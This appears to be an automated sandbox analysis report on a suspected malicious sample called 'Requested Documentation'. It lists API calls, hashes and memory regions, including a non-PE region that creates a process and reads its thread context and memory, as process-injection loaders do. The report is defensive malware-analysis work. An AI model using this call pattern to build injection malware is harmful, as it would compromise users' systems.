                                                                              • Opcode Fuzzy Hash: 301cbca3b7cc6d6c0fbc51a5c2d6b2b5bfed072380a06233fe066c837b0b7cd6
                                                                              • Instruction Fuzzy Hash: 75116F799083059FCB00EFB8D80595ABBE8EFC6750F10851BF04193261DBB19546CB92
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00985821,?,?,?,?), ref: 00985CC7
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00985821,?,?,?,?), ref: 009BDD73
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 995311fa7ab2b9e9a8278e2ef0e922baa078395dd943701c1640f299b5dc6dbc
                                                                              • Instruction ID: f1e17302eacb233b17fd0b6fe331dfba52ae3194edfb12851bb209721dffd1f0
                                                                              • Opcode Fuzzy Hash: 995311fa7ab2b9e9a8278e2ef0e922baa078395dd943701c1640f299b5dc6dbc
                                                                              • Instruction Fuzzy Hash: B6019270244708BEF7245E64CD8AF763BDCAB01768F108319BBE5AA2E0C6B45C4D8F50
                                                                              APIs
                                                                                • Part of subcall function 009A571C: __FF_MSGBANNER.LIBCMT ref: 009A5733
                                                                                • Part of subcall function 009A571C: __NMSG_WRITE.LIBCMT ref: 009A573A
                                                                                • Part of subcall function 009A571C: RtlAllocateHeap.NTDLL(01340000,00000000,00000001,00000000,?,?,?,009A0DD3,?), ref: 009A575F
                                                                              • std::exception::exception.LIBCMT ref: 009A0DEC
                                                                              • __CxxThrowException@8.LIBCMT ref: 009A0E01
                                                                                • Part of subcall function 009A859B: RaiseException.KERNEL32(?,?,?,00A39E78,00000000,?,?,?,?,009A0E06,?,00A39E78,?,00000001), ref: 009A85F0
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3902256705-0
                                                                              • Opcode ID: 56a7943b126f61ca9398eba927dcb239354e2e7d009c3ae2f0c8fd2243ea7190
                                                                              • Instruction ID: 5d8f7960568086cf1fd5036922789705acc5f97d4ccf55521183331cd39461f3
                                                                              • Instruction Fuzzy Hash: E3F0A43294031966CF10AAA4EC05BDF77ACEF87311F104865FD08A6291EFB1DA9092D1
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: __lock_file_memset
                                                                              • String ID:
                                                                              • API String ID: 26237723-0
                                                                              • Opcode ID: 64b3411346310648f5f3b7a3dbae1a75feaea29c41495279ce86772f55f0fea7
                                                                              • Instruction ID: 7a6984b1e6e01c59b0342faf032af5e351c3b88815a95b680ff52d681e65d9e1
                                                                              • Instruction Fuzzy Hash: 2F01F271900A08EBCF12AF689D06A9F7B71BFD3321F464115F8241B1A1DB318A21DFD1
                                                                              APIs
                                                                                • Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28
                                                                              • __lock_file.LIBCMT ref: 009A53EB
                                                                                • Part of subcall function 009A6C11: __lock.LIBCMT ref: 009A6C34
                                                                              • __fclose_nolock.LIBCMT ref: 009A53F6
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              • Opcode ID: fb0187e6533920643eb8f918adb2beb454659d5a84387350529efd915bf9cb29
                                                                              • Instruction ID: 171374b66b016898875cef04160c2fa20de39e2588bbb79a3d8ed606d988dfaa
                                                                              • Instruction Fuzzy Hash: F4F09631A00A04DADF107B6598057AE76E06FC3374F268504E464AB1C1CFBC49415BD1
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0098542F,?,?,?,?,?), ref: 0098807A
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0098542F,?,?,?,?,?), ref: 009880AD
                                                                                • Part of subcall function 0098774D: _memmove.LIBCMT ref: 00987789
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                              • String ID:
                                                                              • API String ID: 3033907384-0
                                                                              • Opcode ID: 3d2913e895289b9f012edbf0c6360259e18af65989b65ace6aef2dc2b11b10d3
                                                                              • Instruction ID: de942481e7e0e9a2e58009e9c96bd7e33a6eb9b73928567a45e55099346acdf4
                                                                              • Instruction Fuzzy Hash: 49018F31201204BEEB24BA61DC4AF7B7B6DEB86360F108029F905DE290DA2098019671
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01301ACD
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01301AF1
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01301B13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                              • Instruction ID: 0f1a4771fea417e723b9e0f15891666667c944e44923f617d4017eb72a65eacd
                                                                              • Instruction Fuzzy Hash: AB12CD24E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 35ddff78120573d4e1a8dd67c2df92e8f2cfc1c162c2b6db38620765b2c6a48e
                                                                              • Instruction ID: 2404d2da7b1f53b4ed1c0b9e59dcd09468be69d6e81b0a9c869de760bc730509
                                                                              • Instruction Fuzzy Hash: 0B517D31A00604AFCF14FB68C991FAE77A6AF89310F15856CF806AB392DA34ED05DB51
                                                                              APIs
                                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00985B96
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: 79a2bb10712012e2617449797ad7eae996fac6ea63c3d66785c4550ed32bc13d
                                                                              • Instruction ID: ac64be2c606df516ac5adb7122077f7200a86481e88a11954425b41f305a6208
                                                                              • Instruction Fuzzy Hash: 84316131A00A09AFCB18EF6CC480AADF7B5FF94320F168629D81593750D774BD94CB91
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: a850029db0792a0e4c031a327480b8832ee8123c614be40d3df220babde3f1cf
                                                                              • Instruction ID: 89a26b569dba49c2aa36a5dace447ae5a32e8a7b2f3400f48e23840a3c017c41
                                                                              • Instruction Fuzzy Hash: 1441E5745043419FDB24DF14C454B1ABBE1BF89318F1988ACE8998B762C736E845CF92
                                                                              APIs
                                                                                • Part of subcall function 00984BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00984BEF
                                                                                • Part of subcall function 009A525B: __wfsopen.LIBCMT ref: 009A5266
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984E0F
                                                                                • Part of subcall function 00984B6A: FreeLibrary.KERNEL32(00000000), ref: 00984BA4
                                                                                • Part of subcall function 00984C70: _memmove.LIBCMT ref: 00984CBA
                                                                              Similarity
                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                              • String ID:
                                                                              • API String ID: 1396898556-0
                                                                              • Opcode ID: 1319efe22567015e8cad56a80a55fea8bb0fe970898c179d0b9b769c45f5eb84
                                                                              • Instruction ID: de3ee2906773a4094edcb24aa98f7d2c4d4dbddd68e1080373919bb7b7dd5d18
                                                                              • Instruction Fuzzy Hash: 3811A731600706ABCF25FF74C856FAE77A9AF84710F108829F545A7282EA7599019B91
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: bdab4965a4ec5b9d7974a15cbcf2483cce24268f6f301efd9228cd26a5fa60f6
                                                                              • Instruction ID: 9a1ad245d1419b54edd73a8413872d1d80e863b55f9554b3f3feb9cdc1b7c5fd
                                                                              • Instruction Fuzzy Hash: 67212474908341DFDB24EF64C444B1ABBE0BF89314F09896CF88A97762D731E805CB92
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 73d0b8cba18bb1d0ddd587b7b1e43a911a5c10eba15cf7c887d481c64711f381
                                                                              • Instruction ID: 5859b36bb18d059fe154abbf1abfb5f1212d9449f161acd5962fffdf099d2faf
                                                                              • Instruction Fuzzy Hash: FB1170722092156BD714BFA8D881E6AF39DEFC9720724452AF919C7391DB31E810C790
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,009856A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00985C16
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 0b4eebf8acec3d95156a56f8a401a974978f3c52cb0181315507a04f56929f00
                                                                              • Instruction ID: d90bb0279f53a44f7656e25aeb37bd353f9299742b813d8777983da2b9b2cf52
                                                                              • Instruction Fuzzy Hash: 92113631200B059FE330DF19C880B62B7E8EF54760F11C92EE9AA87A51D7B0E849CB60
                                                                              APIs
                                                                              • __lock_file.LIBCMT ref: 009A48A6
                                                                                • Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2597487223-0
                                                                              • Opcode ID: 13389fc27e04b0f646cbdb27e904292fafd494c18f8b487eb9db6954f59fb5e6
                                                                              • Instruction ID: 4c251109405aa6fb00fd7de54f97c9e2770dfd900b804b5495f3aec55fe3542c
                                                                              • Opcode Fuzzy Hash: 13389fc27e04b0f646cbdb27e904292fafd494c18f8b487eb9db6954f59fb5e6
                                                                              • Instruction Fuzzy Hash: 42F0AF31900649ABDF11AFA89C067AF36A4AFC2325F158414B5249B192DBFC8951DBD1
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984E7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: 304a0bc49063b63ca91bca1c363e61b0cdef8d0b288a52bc79b17675cbb03784
                                                                              • Instruction ID: 8de1a2d43242aee3370c48c5348f3a068e785a1431763000efabcb6beaa48cae
                                                                              • Opcode Fuzzy Hash: 304a0bc49063b63ca91bca1c363e61b0cdef8d0b288a52bc79b17675cbb03784
                                                                              • Instruction Fuzzy Hash: 89F03971505712CFCB34AF64E494822BBE5BF553293208A3EE2D786722C7369840DF40
                                                                              APIs
                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A07B0
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LongNamePath_memmove
                                                                              • String ID:
                                                                              • API String ID: 2514874351-0
                                                                              • Opcode ID: a77d89b464027acdd064af1b7d92131db7a54e477abf5cd5225ba6f5f9edc471
                                                                              • Instruction ID: 6e50e99fd783bb83cd286bea2f85389ae55d5c408ea0db135641519cf78a3291
                                                                              • Opcode Fuzzy Hash: a77d89b464027acdd064af1b7d92131db7a54e477abf5cd5225ba6f5f9edc471
                                                                              • Instruction Fuzzy Hash: 74E086369041285BC720E6989C05FEAB79DDBC87A0F0441B5FC08D7205D9609C818690
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock
                                                                              • String ID:
                                                                              • API String ID: 2638373210-0
                                                                              • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                              • Instruction ID: a0fd842563c5e9c133ee4e60e0f8b447cbae9f7583b088738060451915f6bcc1
                                                                              • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                              • Instruction Fuzzy Hash: 6BE092B0604B405BD7399A24D800BA373E5AB06304F00081DF6AA83241EB627C418759
                                                                              APIs
                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,009BDD42,?,?,00000000), ref: 00985C5F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: 7d0e2523e8daf464d97297951a70ba3c690a5e8fb8f1eea68e110a0f0540fba1
                                                                              • Instruction ID: 80f07114e4da6c1595e7e41592921ee6d42a7a1d369c111acd544a18160ae7a0
                                                                              • Opcode Fuzzy Hash: 7d0e2523e8daf464d97297951a70ba3c690a5e8fb8f1eea68e110a0f0540fba1
                                                                              • Instruction Fuzzy Hash: DFD0C77464020CBFE710DB80DC46FA9777CD705710F100294FE0466690D6B27D518795
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __wfsopen
                                                                              • String ID:
                                                                              • API String ID: 197181222-0
                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                              • Instruction ID: 313545fe2c12dc246a5886101145bcce01bd2b9c9cedf8447cf82ad0f3ad62e6
                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                              • Instruction Fuzzy Hash: 62B0927654020C77CE012A82EC02B893B199B82764F408020FF1C18172A673A6649AC9
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 009ED1FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              • Opcode ID: a284040700a36a68c951b7daf05a3a5d2e0a69a81d27929d3e5c0fac64732519
                                                                              • Instruction ID: 5774685258331a87032767b27de957923155e0db95fa5d9f141d7179cb785aaf
                                                                              • Opcode Fuzzy Hash: a284040700a36a68c951b7daf05a3a5d2e0a69a81d27929d3e5c0fac64732519
                                                                              • Instruction Fuzzy Hash: 72716D342093428FCB05EF65C491B6AB7E4AFC9314F54492DF9969B3A2DB30ED09CB52
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: c048a491aa4dda3c151c4b743e51f194991c5e9b4d2e4cf0dd18b9d468774a92
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 3331B370A001059BC718DF58C484A69FBBAFB9A320B64C7A5E88ACB355D735EDD1DBC0
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 013022B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                              • Instruction ID: c424e505f08011f398819ff39963a4836e64d88ae0f1a8fa881cd00f41a8d686
                                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                              • Instruction Fuzzy Hash: 5EE09A7494010EAFDB00EFA4D54969E7BB4EF04311F1005A1FD0596681DA319A548A62
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 013022B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1739276238.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: a0f9273c6febfcedb835bc99cf963694c85b9f67ff78ba10af719879b9132be2
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: D8E0BF7494010E9FDB00EFA4D54969E7BB4EF04301F100161FD0592281D63199508A62
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A0CB37
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A0CB95
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A0CBD6
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A0CC00
                                                                              • SendMessageW.USER32 ref: 00A0CC29
                                                                              • _wcsncpy.LIBCMT ref: 00A0CC95
                                                                              • GetKeyState.USER32(00000011), ref: 00A0CCB6
                                                                              • GetKeyState.USER32(00000009), ref: 00A0CCC3
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A0CCD9
                                                                              • GetKeyState.USER32(00000010), ref: 00A0CCE3
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A0CD0C
                                                                              • SendMessageW.USER32 ref: 00A0CD33
                                                                              • SendMessageW.USER32(?,00001030,?,00A0B348), ref: 00A0CE37
                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A0CE4D
                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A0CE60
                                                                              • SetCapture.USER32(?), ref: 00A0CE69
                                                                              • ClientToScreen.USER32(?,?), ref: 00A0CECE
                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A0CEDB
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A0CEF5
                                                                              • ReleaseCapture.USER32 ref: 00A0CF00
                                                                              • GetCursorPos.USER32(?), ref: 00A0CF3A
                                                                              • ScreenToClient.USER32(?,?), ref: 00A0CF47
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A0CFA3
                                                                              • SendMessageW.USER32 ref: 00A0CFD1
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A0D00E
                                                                              • SendMessageW.USER32 ref: 00A0D03D
                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A0D05E
                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A0D06D
                                                                              • GetCursorPos.USER32(?), ref: 00A0D08D
                                                                              • ScreenToClient.USER32(?,?), ref: 00A0D09A
                                                                              • GetParent.USER32(?), ref: 00A0D0BA
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A0D123
                                                                              • SendMessageW.USER32 ref: 00A0D154
                                                                              • ClientToScreen.USER32(?,?), ref: 00A0D1B2
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A0D1E2
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A0D20C
                                                                              • SendMessageW.USER32 ref: 00A0D22F
                                                                              • ClientToScreen.USER32(?,?), ref: 00A0D281
                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A0D2B5
                                                                                • Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A0D351
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                              • String ID: @GUI_DRAGID$F
                                                                              • API String ID: 3977979337-4164748364
                                                                              • Opcode ID: 7ef1d97c0349beff3b9b15267b8fc9a494a3393d29e08fb33468fb3692db3e3f
                                                                              • Instruction ID: 81f8e168e315397b41db7e91301fbda94f5636858b57eb1b464ff84e3cc3b6c3
                                                                              • Opcode Fuzzy Hash: 7ef1d97c0349beff3b9b15267b8fc9a494a3393d29e08fb33468fb3692db3e3f
                                                                              • Instruction Fuzzy Hash: 5442CE78604348AFD720CF68E844BAABBE5FF8A320F140A29F555972F1D731D842DB52
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$_memset
                                                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                              • API String ID: 1357608183-1798697756
                                                                              • Opcode ID: db96b5ebb3f2e1f60c7afc6587aa08a57c5ff0810a95875adcd2bf4742e8d929
                                                                              • Instruction ID: e53ee05c59651e5175507fccc39891d310ad296d031e76039e2bfbf109019777
